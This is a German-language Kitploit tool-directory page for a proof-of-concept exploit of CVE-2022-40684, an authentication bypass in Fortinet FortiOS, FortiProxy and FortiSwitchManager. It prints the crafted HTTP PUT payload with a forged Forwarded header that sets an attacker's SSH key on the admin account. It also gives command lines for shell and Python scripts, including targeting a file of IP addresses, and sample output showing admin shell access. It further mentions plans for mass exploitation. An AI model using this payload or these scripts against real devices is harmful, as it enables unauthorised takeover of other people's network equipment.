Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-40684 — Proof-of-concept Exploit für CVE-2022-40684 Authentifizierungsumgehung in Fortinet FortiOS, FortiProxy und FortiSwitchManager. Injiziert SSH-Schlüssel über eine manipulierte HTTP-PUT-Anfrage, um Administratorzugriff zu erlangen. | Kitploit
Tools/GitHubGitHub/iveresk/cve-2022-40684
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubiveresk/cve-2022-40684

CVE-2022-40684

Proof-of-concept Exploit für CVE-2022-40684 Authentifizierungsumgehung in Fortinet FortiOS, FortiProxy und FortiSwitchManager. Injiziert SSH-Schlüssel über eine manipulierte HTTP-PUT-Anfrage, um Administratorzugriff zu erlangen.

Repository anzeigen
11vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-40684 von 1vere$k

Derzeit ist es eine POC-Kopie für CVE-2022-40684, die Fortinet FortiOS-, FortiProxy- und FortiSwitchManager-Geräte betrifft.
Kopiert von https://github.com/horizon3ai/CVE-2022-40684

Analyse

Der Exploit verwendet das einfache Payload:

root@kitploit:~
		PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Report Runner
        Content-Type: application/json
        Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
        Content-Length: 610
        {
        "ssh-public-key1": "fake-key"
        }

Zusammenfassung

Diese POC nutzt die Authentifizierungs-Bypass-Schwachstelle aus, um einen SSH-Schlüssel für den angegebenen Benutzer zu setzen.

Zukunftspläne

Entwicklung zu einem vollwertigen Exploit mit mehreren Zielen und mehreren Servern für Massenexploits.

CLI-Nutzung

root@kitploit:~
1. chmod +x cve-2022-40684.sh
2. ./cve-2022-40684 <TARGET_IP>
 or
2. ./cve-2022-40684 <FILE_NAME>

Beispiel:
./cve-2022-40684.sh ips.txt

PyUsage

python3 CVE-2022-40684.py -t <TARGET_IP> --username admin --key-file ~/.ssh/id_rsa.pub
Das Beispiel:

root@kitploit:~
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.
Tool herunterladen